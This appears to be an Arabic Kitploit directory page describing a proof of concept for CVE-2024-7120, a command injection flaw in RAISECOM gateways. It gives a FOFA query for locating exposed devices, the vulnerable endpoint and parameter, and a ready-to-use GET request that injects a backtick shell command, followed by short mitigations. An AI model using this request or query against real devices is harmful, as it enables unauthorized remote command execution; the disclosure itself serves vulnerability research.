Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-7120-Exploit-by-Dark-07x — اثبات مفهوم لاستغلال ثغرة حقن الأوامر CVE-2024-7120 في أجهزة بوابة RAISECOM. ينفذ أوامر عشوائية عبر معامل template في ملف list_base_config.php. | Kitploit
أدوات/GitHubGitHub/jokeir07x/cve-2024-7120-exploit-by-dark-07x
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubjokeir07x/cve-2024-7120-exploit-by-dark-07x

CVE-2024-7120-Exploit-by-Dark-07x

اثبات مفهوم لاستغلال ثغرة حقن الأوامر CVE-2024-7120 في أجهزة بوابة RAISECOM. ينفذ أوامر عشوائية عبر معامل template في ملف list_base_config.php.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ سنة واحدةلم تتم المراجعة بعد

Raisecom Devices Command Injection (CVE-2024-7120) إثبات المفهوم!

نظرة عامة

تم تحديد ثغرة حقن الأوامر في أجهزة بوابة RAISECOM، حيث تؤثر على الموديلات MSG1200 وMSG2100E وMSG2200 وMSG2300. تسمح هذه الثغرة للمهاجمين عن بعد بتنفيذ أوامر عشوائية على النظام عبر الواجهة الويب. المشكلة تكمن في السكريبت list_base_config.php، وتحديداً عبر المعامل template، وتؤثر على أكثر من 25,112 جهازاً على الإنترنت.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

المكونات المتأثرة

URI: /vpn/list_base_config.php

الوصف: السكريبت list_base_config.php هو مكون واجهة ويب في أجهزة بوابة RAISECOM يُستخدم لإدارة تكوينات VPN. تنشأ الثغرة المُحددة بسبب المعالجة غير السليمة للمعامل template في هذا السكريبت. يمكن استغلال هذا المعامل لتنفيذ أوامر عشوائية على نظام تشغيل الجهاز بسبب عدم كفاية تنقية المدخلات.

CWE

CWE-77: حقن الأوامر

الاستغلال

إليك مثال على كيفية استغلال الثغرة باستخدام أمر curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

في هذا المثال، يُرسل أمر curl طلب HTTP GET ضار إلى السكريبت list_base_config.php. يستخدم الطلب المعامل template لتنفيذ أمر.

  1. التحقق من المدخلات: تنفيذ فحوصات تحقق صارمة على جميع مدخلات المستخدم، خاصة تلك التي يمكن أن تؤثر على أوامر النظام أو مسارات الملفات.
  2. ضوابط الوصول: تقييد الوصول إلى واجهة الويب للجهاز إلى الشبكات الموثوقة والمستخدمين المُوثقين.
تنزيل الأداة